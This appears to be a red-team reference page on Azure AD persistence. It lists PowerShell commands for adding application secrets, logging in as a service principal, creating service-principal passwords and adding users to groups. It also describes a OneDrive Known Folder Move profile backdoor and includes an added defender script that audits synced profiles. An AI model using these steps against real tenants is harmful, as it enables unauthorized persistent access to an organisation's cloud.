
Azure AD - Persistence

Add Secrets to Application

  • Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1

    PS > . C:\Tools\Add-AzADAppSecret.ps1
    PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
    
  • Use secrets to authenticate as Service Principal

    PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
    PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
    PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
    

Add Service Principal

  • Generate a new service principal password/secret

    Import-Module Microsoft.Graph.Applications
    Connect-MgGraph
    $servicePrincipalId = "<service-principal-id>"
    
    $params = @{
        passwordCredential = @{
            displayName = "NewCreds"
        }
    }
    Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
    

Add User to Group

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

PowerShell Profile Backdoor Using KFM

OneDrive for Business Known Folder Move (KFM) is a feature of Microsoft OneDrive for Business that lets users and organizations automatically redirect the contents of key Windows user folders (Desktop, Documents, and Pictures) from the local PC to OneDrive.

A PowerShell profile is a script file that loads whenever you start a new PowerShell session (such as opening PowerShell or Windows Terminal). Users and administrators often customize their profiles to set aliases, environment variables, functions, or pre-load modules.

Requirements:

  • Files.ReadWrite.All privilege

Methodology:

Known Folder Move moves the user's Documents (and/or Desktop, Pictures) folder to OneDrive for Business, typically syncing:

C:\Users\<username>\Documents -> C:\Users\<username>\OneDrive - <TenantName>\Documents

This means the PowerShell profile file (Documents\PowerShell\Microsoft.PowerShell_profile.ps1) will now be synced to OneDrive.

Push a malicious PowerShell profile at $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1.
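A defender-side check for this technique, added here as an example and not part of the original page: it enumerates the standard PowerShell profile paths for the current user, flags any that resolve under a OneDrive root (the KFM-redirected case, where the file is writable from the cloud side), and reports hash and last-write time for review. It assumes the `$env:OneDrive` / `$env:OneDriveCommercial` variables that the OneDrive sync client sets, falling back to a path match on "OneDrive" when they are absent.

```powershell
# Added example (not from the original page): audit PowerShell profile paths and
# flag those that live inside a OneDrive-synced (KFM-redirected) folder.
# Assumes: run in the context of the user being checked; Windows PowerShell 5.1
# (Documents\WindowsPowerShell) or PowerShell 7 (Documents\PowerShell).

function Get-ProfileAuditReport {
    # $PROFILE exposes the four standard profile locations as note properties.
    $paths = @(
        $PROFILE.AllUsersAllHosts,
        $PROFILE.AllUsersCurrentHost,
        $PROFILE.CurrentUserAllHosts,
        $PROFILE.CurrentUserCurrentHost
    )

    # OneDrive roots advertised by the sync client (assumption: client is installed).
    $oneDriveRoots = @($env:OneDrive, $env:OneDriveCommercial) | Where-Object { $_ }

    foreach ($p in $paths) {
        $exists = Test-Path -LiteralPath $p
        # A profile under a OneDrive root is KFM-redirected and cloud-writable.
        $synced = $false
        foreach ($root in $oneDriveRoots) {
            if ($p.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $synced = $true }
        }
        if (-not $oneDriveRoots) { $synced = $p -match 'OneDrive' }   # fallback heuristic

        $hash = $null; $modified = $null
        if ($exists) {
            $hash     = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
            $modified = (Get-Item -LiteralPath $p).LastWriteTimeUtc
        }

        [pscustomobject]@{
            Path           = $p
            Exists         = $exists
            OneDriveSynced = $synced
            LastWriteUtc   = $modified
            Sha256         = $hash
            Risk           = if ($exists -and $synced) { 'Review: cloud-writable profile' }
                             elseif ($exists)          { 'Local profile present' }
                             else                      { 'None' }
        }
    }
}

Get-ProfileAuditReport | Format-Table -AutoSize
```

Profiles marked "Review" should be compared against a known-good baseline hash, since any change synced through OneDrive runs on the next session start.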
